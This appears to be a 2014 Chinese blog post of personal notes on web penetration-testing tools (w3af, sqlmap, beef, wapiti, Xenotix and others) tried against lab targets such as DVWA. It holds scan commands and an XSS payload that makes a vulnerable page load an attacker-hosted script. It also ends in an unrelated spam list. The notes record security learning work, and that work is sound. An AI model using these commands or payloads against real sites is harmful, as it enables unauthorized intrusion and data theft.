qileilove

          blog已經(jīng)轉(zhuǎn)移至github,大家請?jiān)L問 http://qaseven.github.io/

          常用滲透測試工具使用tips

           前幾日,對常用的滲透測試工具摸了一把,主要是針對sql注入和XSS,抓了些包,現(xiàn)在把常用滲透測試工具使用時(shí)候的應(yīng)該注意的東東記錄了下來,年紀(jì)大了,不寫容易忘~
            歡迎大家指正~
            常用滲透測試工具使用tips
            ---byyd0str
            1.BT5VM版本
            在/pentest/web下面,常用penetrationtest工具
            綜合測試攻擊
            (1)w3af(抓了些包,看著效果不好)
            (這個(gè)配置也非常的惡心,尤其是表單認(rèn)證內(nèi)容,拿DVWA做測試,web.spider爬取的內(nèi)容有問題,全站爬取,不會(huì)從指定起始頁碼爬起)
            下面是表單認(rèn)證的具體步驟:
          1auth--detailed
          username:admin
          password:admin
          method:POST
          auth_url:http://192.168.184.141/dvwa/login.php
          username_field:user(這兩個(gè)地方填錯(cuò)了多次,因?yàn)楸韱文莻€(gè)地方的name有幾處,還是有待進(jìn)一步注意)
          password_field:pass
          check_url:http://192.168.184.141/dvwa/index.php
          check_string:admin
          data_format:username=%U&password=%P&Login=Login
            這時(shí)候如果只選中auth這個(gè)認(rèn)證,然后web.spider,會(huì)提示登陸是否正確
            (https://www.owasp.org/index.php/Automated_Audit_using_W3AF
            http://w3af.org/howtos/authenticated-scans
            http://www.91ri.org/5782.html
            http://www.91ri.org/3117.html)
            (2)burpsuite(這個(gè)也有單獨(dú)版本,如果覺得BT下不好使,可以單獨(dú)使用)
            本身不屬于滲透測試工具,但是可以結(jié)合別的工具使用,這里抓了暴力破解用戶名密碼的包
            (3)skipfish(名人所寫,但是據(jù)說效果不是很好)
            下面這個(gè)是用skipfish掃描dvwa的過程,但是好像是全站爬取,量太大,就暫停了掃描,效果不好
            ./skipfish-odvwa-C"security=high;PHPSESSID=taj2jhiqba3j0fs50pa7f1rb20"-S"dictionaries/complete.wl"-W"dictionaries/webgoat.wl"http://192.168.184.141/dvwa/vulnerabilities/
            (4)zap(暫時(shí)沒有測試,國外黑客對這個(gè)也比較有興趣,也是常用的工具)
            經(jīng)典XSS攻擊平臺
            (5)xsser(http://www.91ri.org/2740.html)注入工具大都是針對有參數(shù)的URL
            這個(gè)是針對帶有參數(shù)的,要看代碼
            (6)beef(抓了包,從包上看是帶有beef指紋的,但是內(nèi)容是加密的,具體的原理要看代碼才能知道了https://github.com/beefproject/beef)
            BT5下的打不開,出錯(cuò)
            直接運(yùn)行BT5下面的beef報(bào)錯(cuò)如下:、
          /root/beef/core/loader.rb:18:in`require':nosuchfiletoload--bundler/setup(LoadError)
          from/root/beef/core/loader.rb:18:in`<top(required)>'
          from./beef:42:in`require'
          from./beef:42:in`<main>'
            上網(wǎng)找了一下,發(fā)現(xiàn)是環(huán)境變量的原因。
            用如下方法再次安裝bundler
            geminstall-–user-installbundler
            此時(shí)刻運(yùn)行,還是會(huì)報(bào)一個(gè)錯(cuò),為
          root@bt:/pentest/web/beef#./beef
          Couldnotfindgem'eventmachine(=0.12.10)ruby'inthegemsavailableonthismachine.
          Run`bundleinstall`toinstallmissinggems.
            然后繼續(xù)運(yùn)行:bundleinstall
            然后在執(zhí)行beef
            (http://m.blog.csdn.net/blog/xihuanqiqi/17091067攻略,很詳細(xì),xsser.meforSAE)

          字體:        | 上一篇 下一篇 | 打印  | 我要投稿 

            (7)sqlmap(python腳本學(xué)習(xí)下)
            經(jīng)典sql注入工具
            (這種針對參數(shù)的工具,不知道是不是掃描方式有問題,還是怎么著,怎么才能抓幾個(gè)包,或者把常用點(diǎn)的包抓出來)
            抓幾個(gè)sqlmap的包
            sqlmap功能很強(qiáng)大,這里就抓了一個(gè)結(jié)合burpsuitePOSTsqlmap的包(也可以用Burpsuitesqlmap插件http://www.freebuf.com/tools/6426.html)
            命令:
            1.先用burpsuite攔截一個(gè)網(wǎng)站(包里用的是wvs的測試網(wǎng)站http://testasp.vulnweb.com/Login.asp)的post請求,然后將這個(gè)請求存下來,比如保存為burpsuite_sql_post.txt
            2.sqlmap.py-r"burpsuite_sql_post.txt"-ptfUName(或者tfUPass)
            綜合掃描系列
            2.wvs(192.168.184.135)
            WVS(WebVulnerabilityScanner)是一個(gè)自動(dòng)化的Web應(yīng)用程序安全測試工具,它可以掃描任何可通過Web瀏覽器訪問的和遵循
            如果在windows下用wireshark抓包,記得用命令形式
            如:tshark-D(找出網(wǎng)卡)
            tshark-i網(wǎng)卡號-bfilesize:10240(10M)-w"xxxxx.pcap"以10M一個(gè)包保存,還有其他功能,比如根據(jù)時(shí)間,存幾個(gè)包,可以參考命令說明
            這個(gè)包存了一大批(4,500)
            3.nessus4.x(5.x版本不好用)(192.168.184.135)
            Nessus開源漏洞掃描與分析軟件。
            賬戶名密碼:xxxx,xxxxx
            這個(gè)掃描需要登錄驗(yàn)證的頁面,比較復(fù)雜,參考這個(gè)鏈接,但是效果不好
            https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf
            抓出來3個(gè)包
            從包中來看,應(yīng)該是能登錄進(jìn)去的,但是后面的鏈接爬取好像有問題,效果不太好
            4.WebCruiserEnt(已經(jīng)抓包,還有l(wèi)og192.168.184.130)
            Web安全掃描工具WebCruiser-WebVulnerabilityScanner
            Web應(yīng)用漏洞掃描器,能夠?qū)φ麄€(gè)網(wǎng)站進(jìn)行漏洞掃描,并能夠?qū)Πl(fā)現(xiàn)的漏洞(SQL注入,跨站腳本,XPath注入等)進(jìn)行驗(yàn)證;它也可以單獨(dú)進(jìn)行漏洞驗(yàn)證,作為SQL注入工具、XPath注入工具、跨站檢測工具使用
            5.appscan不好配置,webgoat虛擬下容易被打掛,需要經(jīng)常重啟,所以先抓了一個(gè)大概的包,payload信息應(yīng)該是全的
            配置的時(shí)候需要記得登錄驗(yàn)證的地方(192.168.184.135)
            http://public.dhe.ibm.com/software/dw/cn/demos/rIntroToAppScan/rIntroToAppScan.pdf
            http://www.nxadmin.com/tools/675.html
            http://www.360doc.com/content/11/0831/10/284310_144677089.shtml
            6.safe3wvs抓了一個(gè),包的數(shù)量不多,掃webgoat有幾個(gè)漏洞(192.168.184.135)
            這個(gè)掃描之前,需要注意輸入驗(yàn)證用戶名密碼的輸入,還有cookie的輸入,這個(gè)地方用temperdata截取了cookie放在了這里
            才能掃出結(jié)果
            SQL注入,XSS專業(yè)平臺
            7.XenotixXSSExploitFrameworkV4(已經(jīng)抓包,需要寫個(gè)使用文檔,在宿主機(jī)本機(jī)上)
            owasp出品,檢測和利用WEB應(yīng)用程序中的XSS漏洞的滲透測試工具。這個(gè)工具可以將代碼注入到含有xss漏洞的web頁面中
            注意事項(xiàng):先配置服務(wù)端,就是一個(gè)本地的IP,比如4.5版本的會(huì)默認(rèn)的127.0.0.1:5050
            這個(gè)地方是為了配置一個(gè)動(dòng)態(tài)的腳本,該腳本在該框架中的用處我們下邊會(huì)進(jìn)行介紹(youtube上有視頻)
            1.首先利用該框架,對victim(受害者)網(wǎng)站進(jìn)行url的注入掃描,就是對參數(shù)進(jìn)行攻擊串的掃描,如果哪個(gè)瀏覽器框架會(huì)體現(xiàn)出存在的XSS點(diǎn),就會(huì)彈彈彈
            這一部分其中是用不到開始配置的那個(gè)本地服務(wù)的js腳本的
            2.如果有個(gè)地方經(jīng)過上面或者其他方式驗(yàn)證,存在XSS點(diǎn),那么就可以插入本地這個(gè)配置的腳本了,比如
            存在XSS點(diǎn)為http://192.168.184.135/aa.php?id=1
            如果這個(gè)id參數(shù)存在XSS威脅,那么可以就是這么插入
            http://192.168.184.135/aa.php?id=1<script>127.0.0.1:5050/xss.js</script>
            這樣就可以利用該框架的包括一些命令執(zhí)行的功能了,相當(dāng)于讓遠(yuǎn)程victim網(wǎng)站加載了本地的JS腳本,進(jìn)行語句執(zhí)行
            8.Havij(已經(jīng)抓包,還有l(wèi)og192.168.184.130)
            Havij是一款自動(dòng)化的SQL注入工具
            (這種工具主要用來配合綜合掃描工具(比如經(jīng)典的配合safe3wvs,然后在配合旁注工具,找到后臺,然后用該工具跑出的用戶名密碼進(jìn)行登錄后臺),
            或者對可疑注入點(diǎn)進(jìn)行注入使用)
            但是對dvwa的注入點(diǎn)進(jìn)行掃描的時(shí)候,沒有找到注入點(diǎn)
            9.wapiti(python腳本學(xué)習(xí)下)(已經(jīng)抓包,還有l(wèi)og192.168.184.130)
            sql注入工具
            工具3.x版本是個(gè)exe,看不到py,可以看看原始的python腳本
            這是一個(gè)輕量級的web掃描工具,具說可以識別文件處理錯(cuò)誤、SQL、LDAP及CRLF類注入攻擊,跨站腳本攻擊、檢查潛在的命令執(zhí)行。wapiti是由python語言開發(fā)的,因此支持的平臺也很廣泛,安裝pythonvm是可以了
            1.通過掃描dvwa來看,效果不好,
            (1)(有登陸,首先進(jìn)行獲取cookie值,該軟件自帶一個(gè)獲取cookie的工具,存成json形式,這個(gè)跟以前的版本不太一致)
            C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.execookie.jsonhttp://192.168.184.141/dvwa/
            (2)帶著cookie去掃描,-s的內(nèi)容好像是可能起始頁,從包上來看,可以在該目錄下遍歷
            C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe"http://192.168.184.141/dvwa/"-ccookie.json-s"http://192.168.184.141/dvwa/vulnerabilities/"
            (3)從攻擊包分析看,是對鏈接拼接了一些串,(http://lzy.iteye.com/blog/338178說不像nikto提供測試用例庫,而是實(shí)現(xiàn)了內(nèi)置的匹配算法)
            但從包上看,大概是一些關(guān)鍵的字符串,具體的所謂的匹配算法還要去看py腳本內(nèi)容
            (4)如果輸入的url不帶參數(shù),就是直接在url后拼接,如果帶參數(shù)輸入命令的話,可以在參數(shù)后進(jìn)行跑
            C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe"http://192.168.184.141/dvwa/"-ccookie.json-s"http://192.168.184.141/dvwa/vulnerabilities/sqli/?id="
            總體效果不好,沒有找到漏洞點(diǎn),反而找到了一個(gè)login.php的SQL注入
            掃描testfire效果好些還可以
          C:\xxxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.execookie.jsonhttp://demo.testfire.net/bank/login.aspx
          C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exehttp://demo.testfire.net/-ccookie.json-xhttp://demo.testfire.net/bank/logout.aspx
            10.pangolin(沒測)
            穿山甲,注入攻擊

          posted on 2014-01-24 16:08 順其自然EVO 閱讀(2150) 評論(0)  編輯  收藏


          只有注冊用戶登錄后才能發(fā)表評論。


          網(wǎng)站導(dǎo)航:
           
          <2014年1月>
          2930311234
          567891011
          12131415161718
          19202122232425
          2627282930311
          2345678

          導(dǎo)航

          統(tǒng)計(jì)

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 体育| 舟曲县| 贵定县| 衡水市| 盐城市| 关岭| 巫溪县| 邳州市| 游戏| 如东县| 蒙山县| 禄丰县| 汉阴县| 宁河县| 秦皇岛市| 深水埗区| 霍城县| 广宗县| 台安县| 新平| 子洲县| 三台县| 平顶山市| 沈丘县| 藁城市| 张家界市| 河源市| 肃宁县| 久治县| 新泰市| 于田县| 永丰县| 华阴市| 鄂伦春自治旗| 永修县| 盐边县| 富顺县| 松潘县| 琼中| 精河县| 顺义区|